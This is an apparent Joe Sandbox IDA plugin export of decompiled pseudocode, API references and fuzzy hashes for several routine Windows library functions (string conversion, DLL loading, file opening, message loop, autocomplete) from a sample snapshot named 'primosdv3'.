
.exe, xrefs: 00C7D989
.inf, xrefs: 00C7D89A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 387584cb4a412d33b707a7afe5e5e3f0eeac304304000bf00fad0e010e46051b
Instruction ID: 0ff833aa8bb5abed1df4cbd998241cd06cdc7729dd5b6347f25fba1a0bed0e42
Opcode Fuzzy Hash: 387584cb4a412d33b707a7afe5e5e3f0eeac304304000bf00fad0e010e46051b
Instruction Fuzzy Hash: DF51E4710043809ADB319F24E845BAFBBF4AF85744F04841EFADA971A1DB71CB85DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C8A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00C8A95B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t70;
				int _t79;
				void* _t81;
				short* _t82;
				signed int _t88;
				signed int _t91;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				int _t105;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t79 = E00C8EF4C(_a16, _t103);
					_t110 = _t79 - _t103;
					_t4 = _t79 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t79;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t81);
					return E00C7FBBC(_t54, _t81, _v8 ^ _t106, _t96, _t99, _t104);
				} else {
					_t96 = _t54 + _t54;
					_t86 = _t96 + 8;
					asm("sbb eax, eax");
					if((_t96 + 0x00000008 & _t54) == 0) {
						_t82 = 0;
						__eflags = 0;
						L14:
						if(_t82 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00C8ABC3(_t82);
							_t54 = _t105;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t82, _v12);
						_t121 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t59 = E00C8AF6C(_t82, _t86, _v12, _t121, _a8, _a12, _t82, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t59;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t88 = _t96 + 8;
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							__eflags = _t88 & _t59;
							if((_t88 & _t59) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00C8ABC3(_t101);
									goto L36;
								}
								_t61 = E00C8AF6C(_t82, _t88, _t101, __eflags, _a8, _a12, _t82, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00C8ABC3(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t91 = _t96 + 8;
							__eflags = _t96 - _t91;
							asm("sbb eax, eax");
							_t65 = _t59 & _t91;
							_t88 = _t96 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t96 - _t88;
								asm("sbb eax, eax");
								_t101 = E00C88E06(_t88, _t65 & _t88);
								_pop(_t88);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							E00C92010(_t65 & _t88);
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t105 = E00C8AF6C(_t82, 0, _t100, _t125, _a8, _a12, _t82, _t100, _a24, _t70, 0, 0, 0);
						if(_t105 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t96 + 0x00000008;
					_t86 = _t96 + 8;
					if((_t54 & _t96 + 0x00000008) > 0x400) {
						__eflags = _t96 - _t86;
						asm("sbb eax, eax");
						_t82 = E00C88E06(_t86, _t72 & _t86);
						_pop(_t86);
						__eflags = _t82;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t82 = 0xdddd;
						L12:
						_t82 =  &(_t82[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00C92010(_t72 & _t86);
					_t82 = _t107;
					if(_t82 == 0) {
						goto L36;
					}
					 *_t82 = 0xcccc;
					goto L12;
				}
			}

0x00c8a960
0x00c8a961
0x00c8a962
0x00c8a969
0x00c8a96e
0x00c8a974
0x00c8a97a
0x00c8a980
0x00c8a983
0x00c8a983
0x00c8a986
0x00c8a988
0x00c8a988
0x00c8a986
0x00c8a98a
0x00c8a98f
0x00c8a996
0x00c8a999
0x00c8a999
0x00c8a9b5
0x00c8a9bb
0x00c8a9c0
0x00c8ab53
0x00c8ab56
0x00c8ab57
0x00c8ab58
0x00c8ab66
0x00c8a9c6
0x00c8a9c6
0x00c8a9c9
0x00c8a9ce
0x00c8a9d2
0x00c8aa26
0x00c8aa26
0x00c8aa28
0x00c8aa2a
0x00c8ab48
0x00c8ab48
0x00c8ab4a
0x00c8ab4b
0x00c8ab51
0x00000000
0x00c8ab51
0x00c8aa3b
0x00c8aa41
0x00c8aa43
0x00000000
0x00000000
0x00c8aa49
0x00c8aa5b
0x00c8aa60
0x00c8aa64
0x00000000
0x00000000
0x00c8aa71
0x00c8aaab
0x00c8aaae
0x00c8aab1
0x00c8aab3
0x00c8aab5
0x00c8aab7
0x00c8ab03
0x00c8ab03
0x00c8ab05
0x00c8ab05
0x00c8ab07
0x00c8ab41
0x00c8ab42
0x00000000
0x00c8ab47
0x00c8ab1b
0x00c8ab20
0x00c8ab22
0x00000000
0x00000000
0x00c8ab26
0x00c8ab27
0x00c8ab28
0x00c8ab2b
0x00c8ab67
0x00c8ab6a
0x00c8ab2d
0x00c8ab2d
0x00c8ab2e
0x00c8ab2e
0x00c8ab3b
0x00c8ab3d
0x00c8ab3f
0x00c8ab70
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8ab3f
0x00c8aab9
0x00c8aabc
0x00c8aabe
0x00c8aac0
0x00c8aac2
0x00c8aac5
0x00c8aaca
0x00c8aae5
0x00c8aae7
0x00c8aaf1
0x00c8aaf3
0x00c8aaf4
0x00c8aaf6
0x00000000
0x00000000
0x00c8aaf8
0x00c8aafe
0x00c8aafe
0x00000000
0x00c8aafe
0x00c8aacc
0x00c8aace
0x00c8aad2
0x00c8aad7
0x00c8aad9
0x00c8aadb
0x00000000
0x00000000
0x00c8aadd
0x00000000
0x00c8aadd
0x00c8aa73
0x00c8aa78
0x00000000
0x00000000
0x00c8aa7e
0x00c8aa80
0x00000000
0x00000000
0x00c8aa9c
0x00c8aaa0
0x00000000
0x00000000
0x00000000
0x00c8aaa6
0x00c8a9d9
0x00c8a9db
0x00c8a9dd
0x00c8a9e5
0x00c8aa04
0x00c8aa06
0x00c8aa10
0x00c8aa12
0x00c8aa13
0x00c8aa15
0x00000000
0x00000000
0x00c8aa1b
0x00c8aa21
0x00c8aa21
0x00000000
0x00c8aa21
0x00c8a9e9
0x00c8a9ed
0x00c8a9f2
0x00c8a9f6
0x00000000
0x00000000
0x00c8a9fc
0x00000000
0x00c8a9fc

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C857FB,00C857FB,?,?,?,00C8ABAC,00000001,00000001,2DE85006), ref: 00C8A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C8ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00C8AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C8AB35
__freea.LIBCMT ref: 00C8AB42

Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C84286,?,0000015D,?,?,?,?,00C85762,000000FF,00000000,?,?), ref: 00C88E38

__freea.LIBCMT ref: 00C8AB4B
__freea.LIBCMT ref: 00C8AB70

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: f895f53b664fc166300d2a7b1a584c41ccc14647278327a72bec90d9380c6da9
Instruction ID: 0dcfcbe7e7f2ba7e84a6daa023290f7ebbd36ea9c17406419e66bc3c48d803a9
Opcode Fuzzy Hash: f895f53b664fc166300d2a7b1a584c41ccc14647278327a72bec90d9380c6da9
Instruction Fuzzy Hash: F951F272600216AFFB25AE64CC41FBFB7AAEB40718F15462AFC14D6150EB30DD40D79A

Uniqueness

Uniqueness Score: -1.00%

Function 00C83B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C83B72(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0xcc20e0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0xc962b4 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00C86088(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00c83b79
0x00c83bee
0x00c83b7e
0x00c83b80
0x00c83b87
0x00c83b8c
0x00c83b95
0x00c83ba4
0x00c83ba7
0x00c83bad
0x00c83bb1
0x00c83bfa
0x00c83bfc
0x00c83c00
0x00c83c03
0x00c83c03
0x00c83c09
0x00c83c09
0x00c83bf5
0x00c83bf9
0x00c83bf9
0x00c83bb3
0x00c83bbc
0x00c83be6
0x00c83be9
0x00c83beb
0x00c83beb
0x00000000
0x00c83beb
0x00c83bbe
0x00c83bc9
0x00c83bce
0x00c83bd3
0x00000000
0x00000000
0x00c83bda
0x00c83be0
0x00c83be4
0x00000000
0x00000000
0x00000000
0x00c83be4
0x00c83b91
0x00000000
0x00000000
0x00000000
0x00c83b93
0x00c83bf3
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,00C83C35,00000000,00000FA0,00CC2088,00000000,?,00C83D60,00000004,InitializeCriticalSectionEx,00C96394,InitializeCriticalSectionEx,00000000), ref: 00C83C03

Strings

api-ms-, xrefs: 00C83BC3

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: d46101cea9f45e8734b4830ad34d2ca7efe53ad0cf2f29371057375c5a3a7427
Instruction ID: 2f062c96b2992ca2c09c2b3f6c1cb5f274bbf41b5e98b283b71d0212b6c4250c
Opcode Fuzzy Hash: d46101cea9f45e8734b4830ad34d2ca7efe53ad0cf2f29371057375c5a3a7427
Instruction Fuzzy Hash: 4F112971A056A1ABCF22AB689C45B6D37649F01F78F211221F821FB2D0E734EF0087D8

Uniqueness

Uniqueness Score: -1.00%

Function 00C698E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00C698E0(void* __ecx, void* __esi, signed int _a4, short _a8, WCHAR* _a4180, unsigned int _a4184) {
				struct _FILETIME _v0;
				char _t38;
				void* _t40;
				long _t52;
				unsigned int _t53;
				long _t56;
				signed int _t57;
				void* _t61;
				void* _t62;
				long _t68;
				void* _t70;

				_t62 = __esi;
				E00C7EC50(0x1050);
				_t53 = _a4184;
				_t61 = __ecx;
				 *(__ecx + 0x1034) =  *(__ecx + 0x1034) & 0x00000000;
				if( *((char*)(__ecx + 0x30)) != 0 || (_t53 & 0x00000004) != 0) {
					_t38 = 1;
				} else {
					_t38 = 0;
				}
				_push(_t62);
				_t68 = ( !(_t53 >> 1) & 0x00000001) + 1 << 0x1e;
				if((_t53 & 0x00000001) != 0) {
					_t68 = _t68 | 0x40000000;
				}
				_t56 =  !(_t53 >> 3) & 0x00000001;
				if(_t38 != 0) {
					_t56 = _t56 | 0x00000002;
				}
				E00C66EDB( &_a8);
				if( *((char*)(_t61 + 0x24)) != 0) {
					_t68 = _t68 | 0x00000100;
				}
				_t40 = CreateFileW(_a4180, _t68, _t56, 0, 3, 0x8000000, 0); // executed
				_t70 = _t40;
				if(_t70 != 0xffffffff) {
					goto L15;
				} else {
					_v0.dwLowDateTime = GetLastError();
					if(E00C6BB03(_a4180,  &_a8, 0x800) == 0) {
						L16:
						if(_v0.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t61 + 0x1034)) = 1;
						}
						L18:
						if( *((char*)(_t61 + 0x24)) != 0 && _t70 != 0xffffffff) {
							_v0.dwLowDateTime = _v0.dwLowDateTime | 0xffffffff;
							_a4 = _a4 | 0xffffffff;
							SetFileTime(_t70, 0,  &_v0, 0);
						}
						 *((char*)(_t61 + 0x1c)) = 0;
						 *((intOrPtr*)(_t61 + 0x10)) = 0;
						_t30 = _t70 != 0xffffffff;
						_t57 = _t56 & 0xffffff00 | _t30;
						 *((char*)(_t61 + 0x15)) = 0;
						if(_t30 != 0) {
							 *(_t61 + 8) = _t70;
							E00C70602(_t61 + 0x32, _a4180, 0x800);
							 *((char*)(_t61 + 0x25)) = 0;
						}
						return _t57;
					}
					_t70 = CreateFileW( &_a8, _t68, _t56, 0, 3, 0x8000000, 0);
					_t52 = GetLastError();
					if(_t52 == 2) {
						_v0.dwLowDateTime = _t52;
					}
					L15:
					if(_t70 != 0xffffffff) {
						goto L18;
					}
					goto L16;
				}
			}

0x00c698e0
0x00c698e5
0x00c698eb
0x00c698f4
0x00c698f6
0x00c69901
0x00c6990c
0x00c69908
0x00c69908
0x00c69908
0x00c6990e
0x00c69919
0x00c6991f
0x00c69921
0x00c69921
0x00c6992c
0x00c69931
0x00c69933
0x00c69933
0x00c6993a
0x00c69943
0x00c69945
0x00c69945
0x00c6995f
0x00c69965
0x00c6996a
0x00000000
0x00c6996c
0x00c69972
0x00c6998e
0x00c699c8
0x00c699cd
0x00c699cf
0x00c699cf
0x00c699d9
0x00c699de
0x00c699e5
0x00c699ee
0x00c699f9
0x00c699f9
0x00c69a04
0x00c69a07
0x00c69a0a
0x00c69a0a
0x00c69a0d
0x00c69a10
0x00c69a21
0x00c69a25
0x00c69a2a
0x00c69a2a
0x00c69a39
0x00c69a39
0x00c699a8
0x00c699aa
0x00c699b3
0x00c699b5
0x00c699b5
0x00c699c3
0x00c699c6
0x00000000
0x00000000
0x00000000
0x00c699c6

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00C67760,?,00000005,?,00000011), ref: 00C6995F
GetLastError.KERNEL32(?,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C6996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00C67760,?,00000005,?), ref: 00C699A2
GetLastError.KERNEL32(?,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C699AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C699F9

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 7cf724e99e24df205007f9324f985c91899f6fed81f623d808cf7beecac5520a
Instruction ID: 4f4f15176c9dbd542c455e2c566007e1663764cf8670cd3384a758c78fe9c1d6
Opcode Fuzzy Hash: 7cf724e99e24df205007f9324f985c91899f6fed81f623d808cf7beecac5520a
Instruction Fuzzy Hash: CA311530544785AFE7309B24CC85B9ABBD8FB04320F200B1DF9B9961D1D3B59A54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00C70EED Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00C70EED(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				long* _t20;
				void** _t26;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(0xc92641);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00C711CF(__ecx);
				_t20 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t26 = _t28 + 4;
					do {
						E00C70FE4(_t22, _t30,  *_t26);
						FindCloseChangeNotification( *_t26); // executed
						_t20 = _t20 + 1;
						_t26 =  &(_t26[1]);
					} while (_t20 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x00c70eed
0x00c70ef6
0x00c70ef8
0x00c70efd
0x00c70efe
0x00c70f08
0x00c70f0a
0x00c70f0f
0x00c70f11
0x00c70f21
0x00c70f2d
0x00c70f2f
0x00c70f32
0x00c70f34
0x00c70f3b
0x00c70f41
0x00c70f42
0x00c70f45
0x00c70f32
0x00c70f54
0x00c70f60
0x00c70f6c
0x00c70f77
0x00c70f80

APIs

Part of subcall function 00C711CF: ResetEvent.KERNEL32(?), ref: 00C711E1
Part of subcall function 00C711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00C711F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00C70F21
FindCloseChangeNotification.KERNELBASE(?,?), ref: 00C70F3B
DeleteCriticalSection.KERNEL32(?), ref: 00C70F54
CloseHandle.KERNEL32(?), ref: 00C70F60
CloseHandle.KERNEL32(?), ref: 00C70F6C

Part of subcall function 00C70FE4: WaitForSingleObject.KERNEL32(?,000000FF,00C71101,?,?,00C7117F,?,?,?,?,?,00C71169), ref: 00C70FEA
Part of subcall function 00C70FE4: GetLastError.KERNEL32(?,?,00C7117F,?,?,?,?,?,00C71169), ref: 00C70FF6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 565839277-0
Opcode ID: 1c84bbbefe06b654a1daeb87fa4ff42a7fca33f4e503230a9d9764bdcf6eae56
Instruction ID: 012691ca4cb4b7c3acec037dad34391eaec4860536754c3a53d05d465aa3af86
Opcode Fuzzy Hash: 1c84bbbefe06b654a1daeb87fa4ff42a7fca33f4e503230a9d9764bdcf6eae56
Instruction Fuzzy Hash: F6017172100784EFC7329FA4DC89BCAFBA9FB08710F10492AF26B92160CB757A45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C7B568() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xca8458; // 0x302c4
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x00c7b579
0x00c7b581
0x00c7b58a
0x00c7b590
0x00c7b597
0x00c7b5a8
0x00c7b5ac
0x00c7b5b6
0x00000000
0x00c7b5b6
0x00c7b59e
0x00c7b5a6
0x00000000
0x00000000
0x00c7b5a6
0x00c7b5be

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
IsDialogMessageW.USER32(000302C4,?), ref: 00C7B59E
TranslateMessage.USER32(?), ref: 00C7B5AC
DispatchMessageW.USER32(?), ref: 00C7B5B6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: ea49f1b3b8e706ed9052a56c246f9f8f3e7d6e3de9ac54d01770a1100e93a905
Instruction ID: 801ccef3ff7073cd9888f00a71f045cc942c0f86fcec78edc4a46d4c76b0958e
Opcode Fuzzy Hash: ea49f1b3b8e706ed9052a56c246f9f8f3e7d6e3de9ac54d01770a1100e93a905
Instruction Fuzzy Hash: 96F07072A0115AAB8B20ABE6EC4CFDF7FBCEE057957408455F519D2050EB74DA05CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C7ABAB(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00C71FBB( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00c7abbb
0x00c7abc2
0x00c7abca
0x00c7abcd
0x00c7abda
0x00c7abe1
0x00c7abe9
0x00c7abef
0x00c7abef
0x00c7abf1
0x00c7abf4
0x00c7abf9
0x00000000
0x00c7abf9
0x00c7ac01

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00C7ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00C7ABF9

